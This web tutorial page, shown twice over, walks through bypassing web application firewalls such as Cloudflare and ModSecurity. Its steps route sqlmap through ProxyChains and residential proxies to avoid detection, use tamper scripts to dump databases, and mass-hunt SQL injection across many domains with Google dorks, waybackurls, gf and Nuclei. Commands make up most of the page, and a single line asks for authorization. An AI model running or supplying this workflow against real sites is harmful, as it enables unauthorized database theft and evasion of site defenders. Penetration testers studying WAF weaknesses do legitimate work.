WAF Bypass with SQLMap

Bypass WAFs using SQLMap + ProxyChains + tamper scripts

9 Steps

22 Commands

1What is a WAF?2Setup Requirements 3Configuring ProxyChains 4Validating ProxyChains with Curl 5SQLMap + ProxyChains + Tamper Scripts 6Mass Hunting SQLi 7Reducing Noise for Effective Scanning 8Scanning with Nuclei SQLi Templates 9Conclusion

A Web Application Firewall monitors and filters HTTP traffic to protect applications by blocking malicious payloads like SQL injection, XSS and more.

Tools & Resources

Cloudflare

Popular CDN + WAF provider

ModSecurity

Open-source WAF engine

AWS WAF

Amazon Web Services WAF

Imperva

Enterprise WAF solution

Commands & Payloads

1Feature: Request filtering

Request filtering - inspect and block malicious requests

2Feature: Geo-blocking

Geo-blocking - restrict traffic by region

3Feature: Rate limiting

Rate limiting - prevent brute force and DDoS

4Feature: Custom rules

Custom rule creation - tailor rules for your app

Pro Tips

WAFs use signature-based and behavioral detection
Each WAF has different bypass methods
Always test with authorization first

Before we begin, we need: SQLMap for automating SQL injections, ProxyChains for routing through proxies, and Residential Proxies to mimic real users.

Commands & Payloads

1Required: SQLMap

SQLMap - powerhouse for automating SQL injections

2Required: ProxyChains

ProxyChains - routes traffic through multiple proxies

3Required: Residential Proxies

Residential Proxies - mimic real users to avoid detection

Pro Tips

Install SQLMap: git clone https://github.com/sqlmapproject/sqlmap
ProxyChains comes pre-installed on most pentest distros
Residential proxies are more effective than datacenter proxies

Open the ProxyChains config file, disable local proxy, add residential proxies, and enable random chain for reliability.

Commands & Payloads

1Open ProxyChains config file

sudo mousepad /etc/proxychains.conf

2Disable default Tor proxy

Comment out: # socks4 127.0.0.1 9050

3Add residential proxies

Add proxies: http <ip> <port> [user] [pass]

4Disable dynamic chain

Disable: #dynamic_chain

5Enable random chain for reliability

Enable: random_chain

6Quiet mode - no library output

Add: quiet_mode

Pro Tips

Random chain improves reliability with multiple proxies
Each connection uses a random proxy from the list
Test with a small proxy list first to verify config

After configuration, run curl through ProxyChains to verify everything is working correctly.

Commands & Payloads

1Check proxy chain is working

proxychains curl http://ipinfo.io

2Verify IP is masked

proxychains curl http://ipinfo.io/ip

Pro Tips

The IP shown should be from your proxy list, not your real IP
If connection fails, check proxy format in config file
Test multiple times to verify random chain is working

Use SQLMap with ProxyChains and tamper scripts to bypass Cloudflare WAF and dump databases.

Commands & Payloads

1SQLMap WAF bypass with ProxyChains and tampers

proxychains sqlmap -u 'url' --dbs --batch -p id --random-agent --tamper=between,space2comment --dbms mysql --tech=B --no-cast --flush-session --threads 10

Pro Tips

Tamper scripts: between, space2comment help bypass WAF rules
--random-agent changes User-Agent per request
--tech=B limits to boolean-based blind injection (quieter)
--no-cast avoids CAST expressions (detected by some WAFs)

Scale the process by hunting SQL injection across similar subdomains using Google Dorks and passive sources.

Tools & Resources

Dorking Script

Google dorking script for subdomain discovery

waybackurls

Fetch URLs from Wayback Machine

gf (grep patterns)

Pattern matching for common vulnerabilities

uro

Remove duplicate URLs

Commands & Payloads

1Dorking script for finding subdomains

https://github.com/coffinxp/scripts/blob/main/dorking.py

2Extract domain names from URLs

cat urls.txt | awk -F/ '{print $3}' | sort -u

3Get SQL param URLs from passive sources

cat urls.txt | waybackurls | gf sqli | uro > new.txt

Pro Tips

Use Google Dorks to find similar subdomains first
waybackurls fetches historical URLs from Archive.org
gf sqli filters URLs with SQL injection parameters

Reduce noise by getting one SQL param URL per domain to efficiently scan across a wide range of assets.

Commands & Payloads

1One SQL param URL per domain

cat urls.txt | gawk -F/ '{host=$3; sub(/:80$/, "", host); if (!(host in seen)) { print $0; seen[host] } }'

Pro Tips

Testing all URLs at once is inefficient
This regex gives one unique URL per domain
Great for quickly identifying vulnerable targets

Fire up Nuclei with DAST SQLi templates to scan for SQL injection vulnerabilities.

Tools & Resources

Nuclei DAST SQLi Template

DAST SQL injection detection template

Error SQLi Template

Error-based SQLi detection

Commands & Payloads

1Nuclei scan with DAST SQLi template

nuclei -l urls.txt -t nuclei-templates/dast/sql-injection.yaml

2Error-based SQLi Nuclei template

https://github.com/coffinxp/nuclei-templates/blob/main/errsqli.yaml

Pro Tips

Nuclei can scan thousands of URLs quickly
DAST templates detect active vulnerabilities
Combine with gf and uro for cleaner results

ProxyChains and SQLMap make a powerful combo for bypassing WAFs. With residential proxies and tamper scripts, you can bypass Cloudflare, ModSecurity, and more.

Pro Tips

ProxyChains + residential proxies + SQLMap tampers = WAF bypass
Scale testing with Google Dorks + waybackurls + gf + uro
Use Nuclei DAST templates for mass scanning
Focus on finding real issues, not false alarms

For educational and authorized testing purposes only.

WAF Bypass & PoCs

WAF Bypass with SQLMap

Bypass WAFs using SQLMap + ProxyChains + tamper scripts

9 Steps

22 Commands

A Web Application Firewall monitors and filters HTTP traffic to protect applications by blocking malicious payloads like SQL injection, XSS and more.

Tools & Resources

Cloudflare

Popular CDN + WAF provider

ModSecurity

Open-source WAF engine

AWS WAF

Amazon Web Services WAF

Imperva

Enterprise WAF solution

Commands & Payloads

1Feature: Request filtering

Request filtering - inspect and block malicious requests

2Feature: Geo-blocking

Geo-blocking - restrict traffic by region

3Feature: Rate limiting

Rate limiting - prevent brute force and DDoS

4Feature: Custom rules

Custom rule creation - tailor rules for your app

Pro Tips

WAFs use signature-based and behavioral detection
Each WAF has different bypass methods
Always test with authorization first

Before we begin, we need: SQLMap for automating SQL injections, ProxyChains for routing through proxies, and Residential Proxies to mimic real users.

Commands & Payloads

1Required: SQLMap

SQLMap - powerhouse for automating SQL injections

2Required: ProxyChains

ProxyChains - routes traffic through multiple proxies

3Required: Residential Proxies

Residential Proxies - mimic real users to avoid detection

Pro Tips

Install SQLMap: git clone https://github.com/sqlmapproject/sqlmap
ProxyChains comes pre-installed on most pentest distros
Residential proxies are more effective than datacenter proxies

Open the ProxyChains config file, disable local proxy, add residential proxies, and enable random chain for reliability.

Commands & Payloads

1Open ProxyChains config file

sudo mousepad /etc/proxychains.conf

2Disable default Tor proxy

Comment out: # socks4 127.0.0.1 9050

3Add residential proxies

Add proxies: http <ip> <port> [user] [pass]

4Disable dynamic chain

Disable: #dynamic_chain

5Enable random chain for reliability

Enable: random_chain

6Quiet mode - no library output

Add: quiet_mode

Pro Tips

Random chain improves reliability with multiple proxies
Each connection uses a random proxy from the list
Test with a small proxy list first to verify config

After configuration, run curl through ProxyChains to verify everything is working correctly.

Commands & Payloads

1Check proxy chain is working

proxychains curl http://ipinfo.io

2Verify IP is masked

proxychains curl http://ipinfo.io/ip

Pro Tips

The IP shown should be from your proxy list, not your real IP
If connection fails, check proxy format in config file
Test multiple times to verify random chain is working

Use SQLMap with ProxyChains and tamper scripts to bypass Cloudflare WAF and dump databases.

Commands & Payloads

1SQLMap WAF bypass with ProxyChains and tampers

proxychains sqlmap -u 'url' --dbs --batch -p id --random-agent --tamper=between,space2comment --dbms mysql --tech=B --no-cast --flush-session --threads 10

Pro Tips

Tamper scripts: between, space2comment help bypass WAF rules
--random-agent changes User-Agent per request
--tech=B limits to boolean-based blind injection (quieter)
--no-cast avoids CAST expressions (detected by some WAFs)

Scale the process by hunting SQL injection across similar subdomains using Google Dorks and passive sources.

Tools & Resources

Dorking Script

Google dorking script for subdomain discovery

waybackurls

Fetch URLs from Wayback Machine

gf (grep patterns)

Pattern matching for common vulnerabilities

uro

Remove duplicate URLs

Commands & Payloads

1Dorking script for finding subdomains

https://github.com/coffinxp/scripts/blob/main/dorking.py

2Extract domain names from URLs

cat urls.txt | awk -F/ '{print $3}' | sort -u

3Get SQL param URLs from passive sources

cat urls.txt | waybackurls | gf sqli | uro > new.txt

Pro Tips

Use Google Dorks to find similar subdomains first
waybackurls fetches historical URLs from Archive.org
gf sqli filters URLs with SQL injection parameters

Reduce noise by getting one SQL param URL per domain to efficiently scan across a wide range of assets.

Commands & Payloads

1One SQL param URL per domain

cat urls.txt | gawk -F/ '{host=$3; sub(/:80$/, "", host); if (!(host in seen)) { print $0; seen[host] } }'

Pro Tips

Testing all URLs at once is inefficient
This regex gives one unique URL per domain
Great for quickly identifying vulnerable targets

Fire up Nuclei with DAST SQLi templates to scan for SQL injection vulnerabilities.

Tools & Resources

Nuclei DAST SQLi Template

DAST SQL injection detection template

Error SQLi Template

Error-based SQLi detection

Commands & Payloads

1Nuclei scan with DAST SQLi template

nuclei -l urls.txt -t nuclei-templates/dast/sql-injection.yaml

2Error-based SQLi Nuclei template

https://github.com/coffinxp/nuclei-templates/blob/main/errsqli.yaml

Pro Tips

Nuclei can scan thousands of URLs quickly
DAST templates detect active vulnerabilities
Combine with gf and uro for cleaner results

ProxyChains and SQLMap make a powerful combo for bypassing WAFs. With residential proxies and tamper scripts, you can bypass Cloudflare, ModSecurity, and more.

Pro Tips

ProxyChains + residential proxies + SQLMap tampers = WAF bypass
Scale testing with Google Dorks + waybackurls + gf + uro
Use Nuclei DAST templates for mass scanning
Focus on finding real issues, not false alarms

For educational and authorized testing purposes only.

WAF Bypass with SQLMap

Table of Contents

What is a WAF?

Tools & Resources

Commands & Payloads

Pro Tips

Setup Requirements

Commands & Payloads

Pro Tips

Configuring ProxyChains

Commands & Payloads

Pro Tips

Validating ProxyChains with Curl

Commands & Payloads

Pro Tips

SQLMap + ProxyChains + Tamper Scripts

Commands & Payloads

Pro Tips

Mass Hunting SQLi

Tools & Resources

Commands & Payloads

Pro Tips

Reducing Noise for Effective Scanning

Commands & Payloads

Pro Tips

Scanning with Nuclei SQLi Templates

Tools & Resources

Commands & Payloads

Pro Tips

Conclusion

Pro Tips

WAF Bypass with SQLMap

Table of Contents

What is a WAF?

Tools & Resources

Commands & Payloads

Pro Tips

Setup Requirements

Commands & Payloads

Pro Tips

Configuring ProxyChains

Commands & Payloads

Pro Tips

Validating ProxyChains with Curl

Commands & Payloads

Pro Tips

SQLMap + ProxyChains + Tamper Scripts

Commands & Payloads

Pro Tips

Mass Hunting SQLi

Tools & Resources

Commands & Payloads

Pro Tips

Reducing Noise for Effective Scanning

Commands & Payloads

Pro Tips

Scanning with Nuclei SQLi Templates

Tools & Resources

Commands & Payloads

Pro Tips

Conclusion

Pro Tips